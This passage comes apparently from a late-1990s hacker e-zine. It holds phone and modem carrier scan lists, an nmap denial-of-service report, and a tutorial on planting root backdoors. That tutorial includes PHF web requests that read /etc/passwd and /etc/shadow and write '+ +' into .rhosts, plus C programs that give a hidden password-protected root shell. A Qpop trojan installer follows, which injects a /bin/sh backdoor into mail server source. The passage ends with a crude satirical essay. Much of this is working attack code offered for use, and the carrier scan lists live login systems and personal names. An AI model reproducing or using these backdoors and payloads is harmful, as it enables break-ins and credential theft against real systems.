  805. 321-6935  dialtone [you have dialled an invalid account code]
  806. 321-8593  dialtone
  807. 232-1243  beepboop tone
  808. 232-1198  beepboop tone
  809. 232-1922  beepboop tone
  810. 321-6891  beepboop tone
  811. 321-0301  beepboop tone
  812. 321-5963  beepboop tone
  813. 321-9002  beepboop tone
  814. 535-2361  tone
  815. 535-2456  weird siren tone
  816.  
  817. other...
  818. --oOo---
  819.  
  820. 535-2056  na
  821. 837-4391  rec unable to answer at present please try later
  822.  
  823. force...
  824. --oOo---
  825.  
  826.  force007@hotmail.com
  827.  uk vmb o8oo 919355
  828.  us vmb 18oo 331o17, 6, 4328
  829.  
  830.  'my middle finger won't go down, how do i wave?'
  831.  
  832.  
  833. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  834. -->]OO[:[ nmap DoS ]::::::::[OO--[ by gov-boi ]---[ hotmetal@hack.co.za]:::::
  835. -->[OO]:::::::::::::::::::::::::::::::[ http://www.hack.co.za ]::::::::::::::
  836.  
  837.  
  838. subject: (local?) linux DoS using nmap
  839.  
  840. Good day..
  841.  
  842. I appologize if this is old but seems still to be
  843. working/active on my own server. (slackware 4.0.0).
  844. I would be interested to know which other distro's
  845. this works against.
  846.  
  847. Tested against:
  848.   slackware 4.0.0
  849.   debian 2.1
  850.   Redhat 6.0
  851.  
  852. I became aware of this when local users begun
  853. to launch DoS attacks.
  854.  
  855.  
  856. kernel:~$ nmap 127.[0-255].[0-255].[0-255] -p 21 -sT
  857.  
  858. Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
  859. Interesting ports on localhost (127.0.0.1):
  860. Port    State       Protocol  Service
  861. 21      open        tcp        ftp
  862.  
  863. Interesting ports on  (127.0.0.2):
  864. Port    State       Protocol  Service
  865. 21      open        tcp        ftp
  866.  
  867. <snip>
  868.  
  869. and it keeps going untill the +/-280th packet..
  870.  
  871. <snip>
  872. Interesting ports on  (127.0.1.32):
  873. Port    State       Protocol  Service
  874. 21      open        tcp        ftp
  875.  
  876. No ports open for host  (127.0.1.33)
  877. No ports open for host  (127.0.1.34)
  878. No ports open for host  (127.0.1.35)
  879.  
  880. etc.. etc..
  881. <snip>
  882.  
  883. I havent tested it on remote machines,
  884. but this looks like a tcp/syn flood?
  885.  
  886. Anyhow, local users can shutdown any
  887. local daemon running on any port.
  888. (apache was the only service
  889.  that remaining running.)
  890.  
  891. The rest of the other services became
  892. unusable/(dead?).
  893.  
  894. Any ideas how one could prevent this?
  895. Sorry again if this is old.
  896.  
  897. Regards
  898.  hotmetal of (src)
  899.  hotmetal@hack.co.za
  900.  
  901. (      www.hack.co.za        )
  902. (e x p l o i t    m a t r i x)
  903. (world domination in progress)
  904.  
  905.  
  906. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  907. -->]OO[:[ Backdoors ]::::::::::::[OO--[ by msinister ]---[  ]::::::::::::::::
  908. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  909.  
  910.                   <><><><><><><><><><><><><><><><><>
  911.                   <>                              <>
  912.                   <>     BACK DOORS AND HOW TO    <>
  913.                   <>     GET ROOTS FROM A NON     <>
  914.                   <>          ROOTSHELL           <>
  915.                   <>                              <>
  916.                   <>    BY: MISTER - SINISTER     <>
  917.                   <>                              <>
  918.                   <><><><><><><><><><><><><><><><><>
  919.  
  920.  
  921. berfore startin the articale i would to thnk very much to:
  922. f0x malder!
  923. the leetest hacker/programer i know in the world! (and dont argue!)
  924.  
  925.  
  926. BACKDOORS: 
  927.  
  928. Since hackers have breaked in into systems they wanted to OWEN them
  929. meanin: to have access all the time to the system and not havin to hack it
  930. every time they want to get in and get root.
  931.  
  932. there are many types of backdoor and i'll discus some of them here and
  933. will (hopefuly) show you the reader some ways of makin them and getin root
  934. from a simple user shell in some sytem.
  935.  
  936. PASSWORD DOORS
  937.  
  938. A way of gainin access is to get the /etc/passwd or /etc/shadow file and
  939. tryin to crack it those givin u the abilty to telnet into the system and
  940. enterin as a root.
  941.  
  942. if you have a shell in the system and u do have the prometion to read the
  943. file (passwd or shadow) then congrats u have got a new root
  944. just take the (with your mouse dont copy the file) root line for example: 
  945.  
  946. root:tJWOCaNGtQAtI:0:0:Super-User:/:/usr/local/bin/bash
  947.  
  948. and run on it some kind of a passwd cracker there are alot of this over
  949. the internet i'm sure you can find out one.
  950.  
  951. an other way of gainin the PASSWD file is via the knowen bug PHF (it still
  952. exist }:) so lets say you have found an host the has PHF and u wanna use
  953. it well via PHF u arent exactly root but u have enough to get your hands
  954. on the /etc/passwd or /etc/shadow file (not allways but still there is a
  955. chance) so here is how you do it:
  956.  
  957. GET /cgi-bin/phf?Qalias=x%0aeval%20cat%20/etc/passwd
  958.  
  959. this line will do this (if u were a user in the system)
  960.  
  961. 14:21 ~root@SINISTER /root [10]# cat /etc/passwd
  962.  
  963. and this line will do this on the system: 
  964.  
  965. GET /cgi-bin/phf?Qalias=x%0aeval%20cat%20/etc/shadow
  966.  
  967. 14:21 ~root@SINISTER /root [10]# cat /etc/shadow 
  968.  
  969. now after u have gotten the passwd file u know how to gain a root access
  970. so here is our first root (hopefuly)
  971.  
  972.  
  973. THE '+ +' IN .rhosts ROOT
  974.  
  975. here is another way of gainin root also via PHF (or if u have any other
  976. way to tryin and echo '+ +' to the .rhosts file) the '+ +' means every one
  977. could rlogin into the system with out any passwds (nice heh?)
  978. well here is how to do it via PHF:
  979.  
  980. GET /cgi-bin/phf?Qalias=x%0aeval%20echo%20'%2b%20%2b'%20>%20.rhosts
  981.  
  982. this line is equivlent to
  983.  
  984. 14:21 ~root@SINISTER /root [12]# echo '+ +' > .rhosts
  985.  
  986. and if u have managed to echo it then u got a new root all u have to do
  987. now is to rlogin into the host (i'm sure u know after u are root in the
  988. system what to do :)
  989.  
  990. TELNET BACKDOORS:
  991.  
  992. A telnet backdoor allows to telnet as a root right away 
  993. when u telnet to a host the inetd listens to the port and then receives 
  994. the connection and then passes it to in.telnetd and then opens the program 
  995. login. when doin this the machine checks for things like type of the term
  996. (usaly VT100) and then requires authentication hackers have changed it
  997. that no authentication will be needed (pretty cool heh?)
  998.  
  999. CRONJOB BACKDOORS
  1000.  
  1001. A realy cool way of breakin into a system is to tell the crontab to a run
  1002. a program at a certain time and then u can get into the system for
  1003. example:
  1004.  
  1005. 14:36 ~root@SINISTER /root [18]# crontab -l
  1006. # If you don't want the output of a cron job mailed to you, you have to
  1007. direct
  1008. # any output to /dev/null.  We'll do this here since these jobs should run
  1009. # properly on a newly installed system, but if they don't the average
  1010. newbie
  1011. # might get quite perplexed about getting strange mail every 5 minutes.
  1012. :^)
  1013. #
  1014. # Run the 'atrun' program every 5 minutes
  1015. # This runs anything that's due to run from 'at'. See man 'at' or 'atrun'.
  1016. 0,5,10,15,20,25,30,35,40,45,50,55 * * * *       /usr/lib/atrun 1>
  1017. /dev/null 2> /dev/null
  1018. # This touches a filename in the temp directory so that you can see cron
  1019. #is
  1020. # working if the timestamp is current. Comment it out if it bugs you. :^)
  1021. # * * * * *       touch /tmp/.crond_running
  1022.  
  1023. we can see that my crontab runs every five minutes a program called
  1024. 'atrun' into /dev/null in the same way we can tell to the hacked host to
  1025. run every day at a specific time a program that opens all ports (just a
  1026. dumb example but u know where i'm gettin to :)
  1027.  
  1028.  
  1029. HOW TO MAKE A BACKDOOR
  1030.  
  1031. well now that u know a litle (realllllllly lil) about backdoors lets try
  1032. to make one our self. 
  1033. here is a simple (probebly useles) but it might some time work :)
  1034.  
  1035. main()
  1036. {
  1037.  if (getuid() == /* here enter your UID */)
  1038.    {
  1039.      setuid(0);
  1040.      setgid(0);
  1041.      system("/bin/csh") /* i like C shell more then bash */    
  1042.    }
  1043. }
  1044.  
  1045.  
  1046. as u can see what u have told to the computer to do is this: if the user
  1047. id is mine then plz change my user id and gimme root :) (arent we modest
  1048. in our requests :)
  1049. this file should compile on any system but not the same of gettin root :(
  1050. since it doesnt require any passwd or anythin else it would be a great
  1051. idea to hide it . (this method is only if u have a shell in a system) 
  1052.  
  1053. lets say i have goten a shell and i want to get root and i also want a
  1054. passwd ? ok this can be arranged to :) here is an example for a more
  1055. sufisticated backdoor:
  1056.  
  1057.  
  1058. main(int argc, char *argv[])
  1059.  
  1060. {
  1061.  
  1062.    if (argc != 2) 
  1063.  
  1064.         {
  1065.           printf("usage: %s file name\n", argv[0]);
  1066.           exit(1);
  1067.         }
  1068.    
  1069. /* lets stop here and analyze waht we have dont.
  1070.  * incase the root finds out this file and wants to check it and will type
  1071.  * the name of the file that gives us root all he will get is 
  1072.  * > usage: [the name that u called your backdoor] file name
  1073.  * here is a tip dont call your file backdoor :)
  1074.  * ok lets go on with the program
  1075.  */
  1076.     
  1077.      if (!strcmp(argv[0],"/* enter here your passwd */"))
  1078.         
  1079.           { 
  1080.             setuid(0);
  1081.             setgid(0);
  1082.             system("/bin/csh");
  1083.           }
  1084.       else 
  1085.           printf("%s : %s file has been backed!\n", argv[0], argv[1]);
  1086. }
  1087.  
  1088. lets see what this will do
  1089.  
  1090. 14:57 ~Sinister@SINISTER /home/Sinister [26]> gcc -o back backdoor.c
  1091. 14:57 ~Sinister@SINISTER /home/Sinister [27]> back
  1092. usage : back file name
  1093. 14:57 ~Sinister@SINISTER /home/Sinister [28]> back [i entered here the
  1094. passwd i choosed]
  1095. #id
  1096. uid=0(root) gid=0(root)
  1097. groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
  1098. # exit
  1099. 15:02 ~Sinister@SINISTER /home/Sinister [29]>
  1100.  
  1101. now lets say the root wants to try it on a file he will allways get this
  1102. (doesnt matter if the file exist or doesnt exist)
  1103.  
  1104. 15:02 ~Sinister@SINISTER /home/Sinister [29]>back backdoor.c
  1105. back : backdoor.c file has been backed!
  1106. 15:03 ~Sinister@SINISTER /home/Sinister [30]>
  1107.  
  1108. nice (kinda) if you have more colorful msges to the root like
  1109. > back /etc/passwd
  1110. ok dear root u found my back door
  1111. >
  1112. then feel free to change :)
  1113.  
  1114.  
  1115. ok now that we have made a simple backdoor lets go and make somthin nice
  1116. with a passwd that doesnt shows
  1117.  
  1118.  
  1119. main(int argc, char *argv[])
  1120. {
  1121. chat PASS[7];
  1122.  
  1123.        bzero(7,PASS);
  1124.  
  1125.             PASS[0] = 'a';
  1126.             PASS[1] = 'b';
  1127.             PASS[2] = 'c';
  1128.             PASS[3] = 'd';
  1129.             PASS[4] = 'e';
  1130.             PASS[5] = 'f';
  1131.             PASS[6] = 'g';
  1132.             PASS[7] = 'h';
  1133.     
  1134.          if (argc != 2)
  1135.             { 
  1136.                printf("usage: %s file name\n", argv[0]);
  1137.                exit(1);
  1138.              }
  1139.          
  1140.          if(!strcmp(argv[1], PASS))
  1141.              {       
  1142.                setuid(0);
  1143.                setgid(0);
  1144.                system("/bin/csh");
  1145.               }
  1146.          else
  1147.             printf (%s : %s file has been backed!\n");
  1148. }
  1149.  
  1150.  
  1151. what we have made is we took our old backdoor and entered an array that
  1152. holds 8 charcters and (u can change it into more but i think 8 is enough)
  1153. in this program our passwd is 'abcdefgh' and puted zero's on them using
  1154. the bzero function those hiding the pass.
  1155. lets see what does it do:
  1156.  
  1157. 15:09 ~Sinister@SINISTER /home/Sinister [2]# gcc -o back back.c
  1158. 15:09 ~Sinister@SINISTER /home/Sinister [3]# back
  1159. usage: back file name
  1160. 15:09 ~Sinister@SINISTER /home/Sinister [4]# back abcdefgh
  1161. #exit
  1162. 15:09 ~Sinister@SINISTER /root [5]# back back.c
  1163. back : back.c file has been backed !
  1164. 15:09 ~Sinister@SINISTER /home/Sinister [6]#
  1165.  
  1166. works nice heh? 
  1167.  
  1168. well thats is all for this articale (sux doesnt it :(
  1169.  
  1170. COMMENT 
  1171.  
  1172. for those who want my cool hand made prompt it is also colorful :) and it
  1173. is only colorful if u use csh or tcsh shells here it is :)
  1174.  
  1175. "%S%T%s %U%B~$USER@%m%b%u %B%/%b %U[%h]%u%B%#%b"
  1176.  
  1177. nice heh ? (well i dont care what u think i like it ! :)
  1178.  
  1179. till next time have a nice day and enjoy your self 
  1180.  
  1181. see ya later!
  1182.  
  1183.                                                                 
  1184.                                                                  11/6/99
  1185.  
  1186. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  1187. -->]OO[:[ O8OO917[XXXX] ]:::::::::::::[OO--[ by faith ]---[ ]::::::::::::::::
  1188. -->[OO]:::::::::::::::::::::::::::::::[ http://darkcyde.system7.org ]::::::::
  1189.  
  1190.  
  1191. __________                 ____________________               ________
  1192.   <<      \________       __ !  /     __        ___  \____________/
  1193. ____           |   \ /\  |  \| /     /    \   /|   \  ___     >
  1194.     \          |   |/__\ |__/|=     |      \ / |   | /___\         _________
  1195. __   \_________|___/    \|  \| \    |       !  |___/ \____________/   >>
  1196.   \      <             \   !  \    \___  /            ____           _____
  1197.    \______________________________________/                 \_________/
  1198.     _________D4rkCyde_____________________   Communications  __UK/USA_ 
  1199.    /                      ___ \             ____/         \_____
  1200. __/   ___<_________      /   í  /    /     \    ___   ____________
  1201.      /         |   \ __ /|__/| /    |       í  |   \ /___         \___>>____
  1202. ____/           |   |\  / |  \|=     |      / \ |   | \___/   
  1203.        ____|___/ \/  |__/| \     \__  /   \|___/  ________>___
  1204. __<<______/                í  \____________________/            \_________
  1205.  
  1206.  
  1207.                 *** 0D4YZ 0D4YZ 0D4YZ 0D4YZ 0D4YZ 0D4YZ ***
  1208.  
  1209. *************************************
  1210. * UK Carrier scan of o8oo 917 xxxx. *
  1211. * 19 January 1999 - 10 Febuary 1999 *
  1212. * 117 Carriers, scanned at 96ooBaud *
  1213. *************************************
  1214.  
  1215. *** WARNING ***
  1216.  
  1217. Unauthorised access to or misuse of these
  1218. systems is prohibited and constitutes an
  1219. offence under the Computer Misuse Act 1990.
  1220. We cannot be held responceible for your
  1221. actions if you violate this.
  1222.  
  1223. 19-01-99 04:12:06 08009176827 c9600:
  1224. 19-01-99 04:26:16 08009175162 c2400: 0ÉäÉäP6≈µ╚╚ "¥▒8àE(z┘┴┼└ú_τ
  1225. 19-01-99 04:42:07 08009170887 c9600: 
  1226. 19-01-99 05:56:18 08009171841 c2400:
  1227. 19-01-99 06:21:48 08009175479 c2400:
  1228. 19-01-99 06:43:55 08009171894 c2400:
  1229. 19-01-99 06:46:51 08009172997 c9600:
  1230. 21-01-99 03:48:37 08009177917 c9600: Radius Authentication. @ Userid:
  1231. 21-01-99 03:52:15 08009178510 c9600:
  1232. 21-01-99 04:36:45 08009178731 c9600: Please press <Enter>.. Enter login name:
  1233. 21-01-99 05:04:06 08009175201 c2400:
  1234. 21-01-99 06:36:38 08009174127 c2400:
  1235. 21-01-99 07:10:19 08009170512 c9600: 
  1236. 21-01-99 07:45:05 08009172700 c9600: Warning Unauthorised use of this network
  1237.                                      is prohibited ! Username: PASSCODE:
  1238. 22-01-99 03:10:15 08009173547 c9600:
  1239. 22-01-99 03:29:35 08009172055 c2400:
  1240. 22-01-99 03:43:22 08009171814 cxxxx:
  1241. 22-01-99 04:39:07 08009175061 c2400:
  1242. 22-01-99 04:49:08 08009172194 c9600: Please press <Enter>...I PAn Employee 
  1243.                                      IRHSOICB     
  1244. 22-01-99 05:11:14 08009174274 c2400:
  1245. 22-01-99 06:07:00 08009179249 c9600:
  1246. 22-01-99 06:16:54 08009173546 c9600:
  1247. 22-01-99 07:42:00 08009179057 cxxxx: B00zz0BB00zz0B00zz0BDD18
  1248. B00zz0BDD18
  1249. 22-01-99 16:24:04 08009171874 c9600:
  1250. 22-01-99 16:32:03 08009174567 c9600:
  1251. 23-01-99 02:56:13 08009176608 c9600: User Access Verification. Username:
  1252. 23-01-99 03:15:37 08009175260 c2400:
  1253. 23-01-99 03:32:41 08009175830 c2400:
  1254. 23-01-99 03:59:19 08009174518 c9600: @ Userid: 
  1255. 23-01-99 05:17:30 08009175545 c2400:
  1256. 23-01-99 05:26:33 08009172295 c:     Leave a message and your contact details
  1257.                                      and we will contact you as soon as
  1258.                                      possible.
  1259. 23-01-99 06:04:32 08009174390 c9600: Radius Authentication. @ Userid: 
  1260. 23-01-99 06:21:19 08009175834 c9600: Chorus/MIX V3.2 TTY Login: 
  1261. 23-01-99 06:31:19 08009178863 c9600:
  1262. 23-01-99 18:28:39 08009172997 c9600:
  1263. 23-01-99 18:39:15 08009176030 c9600:
  1264. 24-01-99 06:46:03 08009171816 c9600: @ Userid:
  1265. 24-01-99 07:17:45 08009171615 c9600:
  1266. 24-01-99 08:06:31 08009176432 c9600:
  1267. 24-01-99 09:17:30 08009170633 c9600: login: 
  1268. 24-01-99 09:18:53 08009170668 c9600:
  1269. 24-01-99 11:06:07 08009179041 c9600: Welcome to USRobotics The Intelligent
  1270.                                      Choice in Information Access. login: 
  1271. 24-01-99 12:42:15 08009179246 c9600:
  1272. 24-01-99 18:59:37 08009178928 c9600: Welcome to InterLinx. interlinx!login: 
  1273. 25-01-99 03:42:37 08009171750 c9600:
  1274. 25-01-99 03:44:17 08009173549 c9600:
  1275. 25-01-99 04:09:45 08009179184 c9600:
  1276. 25-01-99 05:16:43 08009175222 c2400:
  1277. 25-01-99 16:36:18 08009178633 c9600: User Access Verification. Username: 
  1278. 25-01-99 16:39:39 08009173512 c9600: User Access Verification. Username:
  1279. 26-01-99 05:07:12 08009174278 c2400:
  1280. 26-01-99 05:31:47 08009170116 c9600:
  1281. 26-01-99 05:37:25 08009178066 c9600: Please press <Enter>... I PSharron
  1282.                                      Creaney SHARRON     
  1283. 26-01-99 05:52:21 08009176792 c2400:
  1284. 26-01-99 06:48:46 08009176521 c9600: **B0100000027fed4
  1285. 26-01-99 06:55:52 08009178703 c9600:
  1286. 26-01-99 15:50:04 08009171800 c9600: Annex Command Line Interpreter *
  1287.                                      Copyright (C) 1988, 1997 Bay Networks
  1288.                                      Checking authorization, Please wait...
  1289.                                      Annex username:
  1290. 26-01-99 15:58:37 08009176950 c9600:
  1291. 27-01-99 04:57:43 08009179457 c9600: @ Userid:
  1292. 29-01-99 00:56:06 08009173548 c9600:
  1293. 29-01-99 03:54:47 08009178374 C9600: Annex Command Line Interpreter   *
  1294.                                      Copyright (C) 1988, 1998 Bay Networks
  1295. #------------------------------------------------------#
  1296. # Welcome to the Watson Wyatt Remote Access Service    #
  1297. #                                                      #
  1298. # None Authorized Users should disconnect NOW !        #
  1299. #                                                      #
  1300. #------------------------------------------------------#
  1301. Trying...
  1302. Connected to 126.52.18.187.
  1303. Attached to port 7
  1304. 29-01-99 04:29:33 08009179206 c9600:
  1305. 29-01-99 04:37:44 08009175775 c9600:
  1306. 29-01-99 05:09:57 08009174298 c2400:
  1307. 29-01-99 07:06:19 08009179248 c9600:
  1308. 29-01-99 08:25:38 08009179245 c9600:
  1309. 29-01-99 08:42:53 08009173432 c9600: Starting SecurID Authentication.User ID: 
  1310. 29-01-99 11:00:51 08009172017 c9600: CCCThis is really RAS3 User Access
  1311.                                      Verification Username: 
  1312. 29-01-99 11:30:15 08009178212 c9600: User Access Verification Username: 
  1313.                                      SNK Challenge: 59886539 Enter Response:
  1314. 30-01-99 03:15:17 08009175024 c2400:
  1315. 30-01-99 03:32:24 08009176461 c9600:  AM¼ AM¼ AM¼ AM¼ AM¼ AM¼ 
  1316. 30-01-99 04:11:52 08009171713 c9600:
  1317. 30-01-99 04:19:58 08009176654 c9600: Starting Radius Authentication. @ Userid:
  1318. 30-01-99 05:30:26 08009171368 c2400: U║ES╕╖½ Zεσq╞òΘ°6├[Æ▐e
  1319. 30-01-99 05:39:43 08009176703 c9600: @ Userid:
  1320. 30-01-99 06:44:49 08009173545 c9600:
  1321. 30-01-99 06:51:00 08009175510 c2400:
  1322. 30-01-99 11:03:24 08009171020 c9600: @ Userid:
  1323. 30-01-99 11:17:18 08009179789 c9600: USRobotics Courier V.Everything Dial
  1324.                                      Security Session Serial Number
  1325.                                      21OZD1G8EAQ3 Password (Ctrl-C to cancel)
  1326. 31-01-99 06:08:05 08009178511 c9600:
  1327. 31-01-99 06:29:55 08009179562 c9600:
  1328. 31-01-99 06:47:32 08009172102 c9600: ╖OªUUUUUUUUUUìKü ù■+++
  1329. 31-01-99 06:52:43 08009173433 c9600:
  1330. 02-02-99 06:52:03 08009179427 c9600: Starting Radius Authentication.@ Userid: ?
  1331. 02-02-99 07:02:01 08009170918 c9600:
  1332. 02-02-99 07:03:15 08009179247 c9600:
  1333. 03-02-99 05:36:19 08009174365 c9600: ** First Option ** Login: 
  1334. 03-02-99 05:39:22 08009172903 c2400: (shitload of garbage charactors)
  1335. 03-02-99 05:57:07 08009173317 c9600:
  1336. 03-02-99 06:34:02 08009173023 c9600: Annex Command Line Interpreter *
  1337.                                      Copyright (C) 1988, 1997 Bay Networks
  1338.                                      Checking authorization, Please wait...
  1339.                                      Annex username:
  1340. 03-02-99 09:22:04 08009170631 c9600:
  1341. 04-02-99 04:11:23 08009178407 c9600: Starting Radius Authentication. @ Userid:
  1342. 04-02-99 04:28:57 08009170889 c9600:
  1343. 04-02-99 04:44:53 08009170064 c9600: User Access Verification Username: 
  1344. 04-02-99 05:08:00 08009173551 c9600: Enter ID:
  1345. 04-02-99 05:09:01 08009176851 c9600: Generic-Sys (generic) [HP Release A.B9.
  1346.                                      04] HP-UX login: 
  1347. 04-02-99 06:10:37 08009170343 c2400: PLEASE ENTER PASSWORD:
  1348. 04-02-99 06:22:43 08009175536 c9600: @ Userid:
  1349. 04-02-99 06:45:12 08009175840 c2400:
  1350. 05-02-99 04:19:03 08009175151 c2400:
  1351. 05-02-99 06:24:48 08009179899 c9600: User Access Verification. Username: 
  1352. 05-02-99 07:02:31 08009175170 c2400:
  1353. 05-02-99 08:31:05 08009172995 c9600:
  1354. 05-02-99 08:38:00 08009171832 c9600: login: 
  1355. 06-02-99 02:22:18 08009175422 c2400: 0ÉäÉä\ Σ5▀$xφⁿ≈w_1¼5≤!ìD┤╩7
  1356. 06-02-99 05:44:27 08009171813 c9600:
  1357. 06-02-99 08:22:14 08009170288 c9600:
  1358. 06-02-99 08:24:09 08009176562 c9600:
  1359. 06-02-99 09:09:34 08009171731 c9600: User Access Verification. Username:
  1360. 07-02-99 07:21:39 08009170366 c2400:
  1361. 07-02-99 07:54:11 08009173451 c9600:
  1362. 08-02-99 05:02:07 08009173650 c2400: 0ÉäÉä£â
  1363. 08-02-99 05:45:19 08009175206 c2400:
  1364. 08-02-99 06:42:28 08009179942 c9600:
  1365. 08-02-99 06:54:39 08009172996 c9600:
  1366. 09-02-99 06:05:47 08009172034 c9600:
  1367. 10-02-99 15:52:04 08009174514 c9600: @ Userid:
  1368.  
  1369.  
  1370.  
  1371. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  1372. -->]OO[:[ Qpop Trojan Installer ]::[OO--[ by gov-boi ]-[ hotmetal@hack.co.za 
  1373. -->[OO]:::::::::::::::::::::::::::::::[ http://www.hack.co.za ]::::::::::::::
  1374.  
  1375.  
  1376. /****
  1377.  
  1378.          Qpop v2.53 Trojan Installer v1.1
  1379.  
  1380.                             c0de by gov-boi/hotmetal of (src)
  1381.                                     hotmetal@hack.co.za
  1382.  
  1383.  
  1384.      Idea thought of by:
  1385.          nikel-com <nikel@legion2000.cc>
  1386. usage:
  1387.    tar -zxf qpopper2.53.tar.Z ..
  1388.    copy src-qpopd.c into the "qpopper2.53" root directory ..
  1389.    compile src-qpopd.c .. run ..
  1390.    compile qpopper2.53 .. install .. ;)
  1391.  
  1392. and have phun kiddies ;)
  1393. backd00r password is "jax0r"
  1394.  
  1395. ****/
  1396.  
  1397.  
  1398. #include <stdio.h>
  1399. #include <stdlib.h>
  1400. #include <unistd.h>
  1401.  
  1402. void display_usage(void);
  1403. int main(int argc, char *argv[])
  1404. {
  1405.   char *scanstring = "The client command was not located in the command/state table";
  1406.   char *w00p="pop_get_command.c";
  1407.   char buffer[1002];
  1408.   char buffer2[1002];
  1409.  
  1410.   FILE *fp, *wo0p;
  1411.   if((fp = fopen(w00p, "r")) == NULL)
  1412.   {
  1413.     fprintf(stderr, "Error opening file: pop_get_command.c\n");
  1414.     fprintf(stderr, "missi0n unsuccessfull.. lam3r!\n");
  1415.     exit(1);
  1416.   }
  1417.   wo0p = fopen("zzzzzz","w");
  1418.   while(fgets(buffer, 1000, fp) != NULL) {
  1419.       strcpy(buffer2, buffer);
  1420.    if(strstr(buffer, scanstring) != 0)
  1421.    {
  1422.       fprintf(wo0p,"    /* The client command was not located in the command/state table */\n");
  1423.       fprintf(wo0p,"    if (p->pop_command = \"jax0r\")\n");
  1424.       fprintf(wo0p,"    { execl(\"/bin/sh\",\"/bin/sh -i\", NULL);return(0);}\n");
  1425.    }
  1426.    if(strstr(buffer, scanstring) == 0)
  1427.    { fprintf(wo0p,"%s", buffer2); }
  1428.   }
  1429.   fclose(fp);
  1430.   fclose(wo0p);
  1431.   system("mv zzzzzz pop_get_command.c");
  1432.   fprintf(stderr, "missi0n successfull.. i phear j00!@#\n");
  1433.   return 0;
  1434. }
  1435.  
  1436.  
  1437. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  1438. -->]OO[:[ Rolling Deep ]::::::::::::[OO--[ by tgb ]---[ ]::::::::::::::::::::
  1439. -->[OO]:::::::::::::::::::::::::::::::[ http://noprotocol.org/tgb ]::::::::::
  1440.  
  1441. Rolling Deep
  1442.  
  1443. With all the dangers and precarious situations the modern hax0r can find
  1444. himself in on the streets, the ninties have brought forth the need to "roll
  1445. deep." The whole rationale behind the concept of rolling deep lies in the age
  1446. old adage. "Strength in numbers," or something along those lines, although
  1447. rolling deep by no means requires a large group or backup posse. The term
  1448. rolling deep stems directly from the world of hardcore hip hop and gangsta
  1449. rap, and is often used in conjunction with phrases like, "Ya best proteck ya
  1450. neck," "bakdafukup," or other equally street-smart phrases that manage to
  1451. incorporate both defensivness and threat. In any case, the implications are
  1452. easily identifiable and the prmoise of quick retaliation looms in the
  1453. foreground; rolling deep is a means of letting people know that you are not
  1454. to be fucked with. The perils of being caught slippin' in this day and age
  1455. are just too great. I know the value of rolling deep and have integrated it
  1456. into my daily routine, rolling deep for such mundane tasks as getting a late-
  1457. night snack from the fridge, buying a new sweater, or making a important
  1458. phone call home. Hopefully some of the following tips, examples, and
  1459. observations will acquaint you with the ways of rolling deep as fuck, 'cause
  1460. it's too dangerous to be caught shallow.
  1461.  
  1462. 1. Put on the hardest clothes you can find (consult the latest number one
  1463.    video on Rap City) and practice scowling in the mirror for a few hours.
  1464.    The scowl is on the most integral aspects of rolling deep and must be
  1465.    perfected, although allowances can be made for the Flava-Flav type joker
  1466.    in every roup. Take a deep breath and tell yourself you are hard until you
  1467.    believe it.
  1468.  
  1469. 2. Pretend you are in a rap video, running down the street in slow motion or
  1470.    backing up the MC. Visualize yourself as an actual member of a video
  1471.    posse.
  1472.  
  1473. 3. Practice the "What the fuck?!" arm gesture (both arms open, palms spread
  1474.    outward) until it becomes an automatic response to any question,
  1475.    especially if from a parent, cop, boss, or teacher.
  1476.    
  1477. 4. Grow some sort of "hard" facial hair.
  1478.  
  1479. 5. Wear a very unhip pair of sunglasses--not bullshit Oakley or Arnet, but
  1480.    something like cop glasses or oversized mom-style glaasses. Basically
  1481.    anything you can snag out of a lost-and-found-bin will do.
  1482.    
  1483. 6. Look around a lot, like you expecting static from any direction.
  1484.  
  1485. 7. Cultivate a fake limp or strut and walk extremely slowly.
  1486.  
  1487. 8. Refer to people only as "bitches" or "fools." Learn to integrate the
  1488.    following words or phrases into your everyday speech, regardless of their
  1489.    meaning in your life: gat, nine, blast in the face, bitchslap,
  1490.    gangstalean, etc.
  1491.  
  1492. You are now ready to assemble the crew and synchronize the eight-step rolling
  1493. deep program. Usually a larger group will signify a deeper roll, but this is
  1494. not always the case. Certain people will never attain the ability to roll
  1495. deep, no matter how much backup they have. Conversely, some motherfuckers
  1496. roll deep when hanging out on solo tip. Some of the deepest rollers are the
  1497. strong, silent types who can handles themselves in any situation. Consider
  1498. the following list of some people who roll deep and some who don't quite make
  1499. it.
  1500.  
  1501. Deep As Fuck:
  1502.  
  1503. Wu-Tang, the Warriors (from that old '70s movie), this dude I once saw
  1504. lounging in a designer sweatsuit and shades, Slayer.
  1505.  
  1506. Wading Pool:
  1507.  
  1508. Hammer, New Kids On The Block, Blackstreet, any fast food employee or
  1509. manager, rock star snowboarders, bitch-ass rollerbladers.
  1510.  
  1511. Of course those you new to the ways of rolling deep should never try to bust
  1512. a flex on someone with experience. First things first, you should go in
  1513. gradually, the way one would enter a pool of freezing water. You should
  1514. initially roll deep only on inanimate objects such as street signs, a jammed
  1515. or locked door, or a soda machine that shorted your coin. From that point you
  1516. should work your way up to blind people or alley cats, but only when you feel
  1517. comfortable. Progression will naturally lead you to flexin' on old ladies and
  1518. infants. Get confident, live your lyrics, and work your way up to speed.
  1519. Eventually you'll be able to walk the streets with pride and conviction that
  1520. can only come with the knowledge that your are rolling deep.
  1521.  
  1522.                         --tgb
  1523.  
  1524. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  1525. -->]OO[:[ 5ESS CDX/VCDXs ]:::::::[OO--[ by hybrid ]---[ hybrid@dtmf.org ]::::
  1526. -->[OO]:::::::::::::::::::::::::::::::[ http://hybrid.dtmf.org ]:::::::::::::
  1527.  
  1528.  
  1529. 5ESS-2OOO Compact Exchange Units.
  1530. by hybr1d (http://DTMF.org/hybrid)
  1531.  
  1532.  
  1533.         o Introduction
  1534.         o Types of compact exchanges
  1535.         o CDX exchange
  1536.         o VCDX exchange
  1537.         o Conclusion
  1538.  
  1539.  
  1540. Introduction
  1541. ------------
  1542.  
